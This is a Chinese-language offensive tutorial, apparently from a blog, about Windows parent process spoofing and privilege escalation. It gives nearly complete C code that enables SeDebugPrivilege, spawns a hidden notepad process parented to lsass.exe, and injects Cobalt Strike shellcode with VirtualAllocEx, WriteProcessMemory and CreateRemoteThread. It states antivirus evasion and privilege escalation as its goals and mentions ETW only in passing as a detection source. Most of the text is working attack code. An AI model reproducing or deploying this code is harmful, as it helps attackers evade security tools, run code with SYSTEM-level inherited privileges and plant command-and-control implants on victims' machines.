文章目录
- 前记
- 普通权限的父进程欺骗
- ShllCode上线
- 进程提权基础
- 进程提权注入
前记
父进程欺骗作用:
- 进程链信任免杀
- 进程提权
检测:
- etw
普通权限的父进程欺骗
#include#include#include DWORD getpid(LPCTSTR ProcessName){HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProceessnap == INVALID_HANDLE_VALUE){puts("创建进行快照失败\n");return 0;}else{PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);BOOL hProcess = Process32First(hProceessnap, &pe32);while (hProcess){if (_wcsicmp(ProcessName, pe32.szExeFile) == 0){printf("pid:%d\n", pe32.th32ProcessID);//printf("ppid:%d", pe32.th32ParentProcessID);CloseHandle(hProceessnap);return pe32.th32ProcessID;}hProcess = Process32Next(hProceessnap, &pe32);}}CloseHandle(hProceessnap);return 0;}int main(){//initializationPROCESS_INFORMATION pi = { 0 };STARTUPINFOEXA si = { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb = sizeof(STARTUPINFOEXA);//getparenthandleDWORD pid = getpid(L"x64dbg.exe");HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessCreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);system("pause");return 0;}关键api、结构体
CreateProcessA
BOOL CreateProcessA([in, optional]LPCSTRlpApplicationName,[in, out, optional] LPSTR lpCommandLine,[in, optional]LPSECURITY_ATTRIBUTES lpProcessAttributes,[in, optional]LPSECURITY_ATTRIBUTES lpThreadAttributes,[in]BOOLbInheritHandles,[in]DWORD dwCreationFlags,[in, optional]LPVOIDlpEnvironment,[in, optional]LPCSTRlpCurrentDirectory,[in]LPSTARTUPINFOAlpStartupInfo,[out] LPPROCESS_INFORMATION lpProcessInformation);PROCESS_INFORMATION
typedef struct _PROCESS_INFORMATION {HANDLE hProcess;HANDLE hThread;DWORDdwProcessId;DWORDdwThreadId;} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;STARTUPINFOEXA
typedef struct _STARTUPINFOEXA {STARTUPINFOA StartupInfo;LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;} STARTUPINFOEXA, *LPSTARTUPINFOEXA;HeapAlloc
DECLSPEC_ALLOCATOR LPVOID HeapAlloc([in] HANDLE hHeap,[in] DWORDdwFlags,[in] SIZE_T dwBytes);UpdateProcThreadAttribute
BOOL UpdateProcThreadAttribute([in, out] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,[in]DWORDdwFlags,[in]DWORD_PTRAttribute,[in]PVOIDlpValue,[in]SIZE_T cbSize,[out, optional] PVOIDlpPreviousValue,[in, optional]PSIZE_TlpReturnSize);PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
lpValue 参数是指向要使用的进程的句柄的指针,而不是作为所创建进程的父进程的调用进程。 要使用的进程必须具有 PROCESS_CREATE_PROCESS 访问权限。
从指定进程继承的属性包括句柄、设备映射、处理器相关性、优先级、配额、进程令牌和作业对象。 (请注意,某些属性(如调试端口)将来自创建过程,而不是此 handle.)
QueueUserAPC
DWORD QueueUserAPC([in] PAPCFUNCpfnAPC,[in] HANDLEhThread,[in] ULONG_PTR dwData);ShllCode上线
#include#include#include DWORD getpid(LPCTSTR ProcessName){HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProceessnap == INVALID_HANDLE_VALUE){puts("创建进行快照失败\n");return 0;}else{PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);BOOL hProcess = Process32First(hProceessnap, &pe32);while (hProcess){if (_wcsicmp(ProcessName, pe32.szExeFile) == 0){printf("pid:%d\n", pe32.th32ProcessID);//printf("ppid:%d", pe32.th32ParentProcessID);CloseHandle(hProceessnap);return pe32.th32ProcessID;}hProcess = Process32Next(hProceessnap, &pe32);}}CloseHandle(hProceessnap);return 0;}int main(){//initializationPROCESS_INFORMATION pi = { 0 };STARTUPINFOEXA si = { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb = sizeof(STARTUPINFOEXA);//getparenthandleDWORD pid = getpid(L"x64dbg.exe");HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessunsigned char shellcode[] = "";CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE,CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x2000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);CloseHandle(pi.hThread);return 0;}
这里cs以notepad进程的分线程上线,当notepad被关闭时cs会被下线
进程提权基础
流程
1.打开进程访问令牌
2.取得特权的LUID值
3.调整访问令牌特权值
使用api,结构体
OpenProcessToken
BOOL OpenProcessToken([in]HANDLEProcessHandle,[in]DWORD DesiredAccess,[out] PHANDLE TokenHandle);LookupPrivilegeValue
BOOL LookupPrivilegeValueA([in, optional] LPCSTR lpSystemName,[in] LPCSTR lpName,[out]PLUIDlpLuid);AdjustTokenPrivileges
BOOL AdjustTokenPrivileges([in]HANDLETokenHandle,[in]BOOLDisableAllPrivileges,[in, optional]PTOKEN_PRIVILEGES NewState,[in]DWORD BufferLength,[out, optional] PTOKEN_PRIVILEGES PreviousState,[out, optional] PDWORDReturnLength);TOKEN_PRIVILEGES
typedef struct _TOKEN_PRIVILEGES {DWORD PrivilegeCount;LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];} TOKEN_PRIVILEGES, *PTOKEN_PRIVILEGES;LUID_AND_ATTRIBUTES
typedef struct _LUID_AND_ATTRIBUTES {LUIDLuid;DWORD Attributes;} LUID_AND_ATTRIBUTES, *PLUID_AND_ATTRIBUTES;EnableDebugPrivilege代码如下
#include #include BOOLEnableDebugPrivilege(){HANDLE token_handle;LUID luid;TOKEN_PRIVILEGES tkp;//打开访问令牌if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&token_handle)){printf("openProcessToken error");return FALSE;}//查询luidif (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid)){CloseHandle(token_handle);printf("lookupPrivilegevalue error");return FALSE;}tkp.PrivilegeCount = 1;tkp.Privileges[0].Luid = luid;tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;//调整访问令牌权限if (!AdjustTokenPrivileges(token_handle,FALSE,&tkp,sizeof(tkp),NULL,NULL)){CloseHandle(token_handle);printf("adjust error");return FALSE;}printf("sucessful");return TRUE;}int main(){EnableDebugPrivilege();system("pause");return 0;}进程提权注入
#include "coleak.h"BOOLEnableDebugPrivilege(){HANDLE token_handle;LUID luid;TOKEN_PRIVILEGES tkp;//打开访问令牌if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle)){printf("openProcessToken error");return FALSE;}//查询luidif (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)){CloseHandle(token_handle);printf("lookupPrivilegevalue error");return FALSE;}tkp.PrivilegeCount = 1;tkp.Privileges[0].Luid = luid;tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;//调整访问令牌权限if (!AdjustTokenPrivileges(token_handle, FALSE, &tkp, sizeof(tkp), NULL, NULL)){CloseHandle(token_handle);printf("adjust error");return FALSE;}printf("sucessful");return TRUE;}DWORD getpid(LPCTSTR ProcessName){HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProceessnap == INVALID_HANDLE_VALUE){puts("创建进行快照失败\n");return 0;}else{PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);BOOL hProcess = Process32First(hProceessnap, &pe32);while (hProcess){if (_wcsicmp(ProcessName, pe32.szExeFile) == 0){printf("pid:%d\n", pe32.th32ProcessID);//printf("ppid:%d", pe32.th32ParentProcessID);CloseHandle(hProceessnap);return pe32.th32ProcessID;}hProcess = Process32Next(hProceessnap, &pe32);}}CloseHandle(hProceessnap);return 0;}VOID ppidfunc(DWORD pid) {PROCESS_INFORMATION pi = { 0 };STARTUPINFOEXA si = { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb = sizeof(STARTUPINFOEXA);//getparenthandleHANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessunsigned char shellcode[] = "";CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x2000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);CloseHandle(pi.hThread);CloseHandle(pi.hProcess);CloseHandle(parentProcessHandle);}int main() {// 进程提权EnableDebugPrivilege();// 找指定进程pidDWORD pid = getpid(L"lsass.exe");// 父进程欺骗ppidfunc(pid);system("pause");return 0;}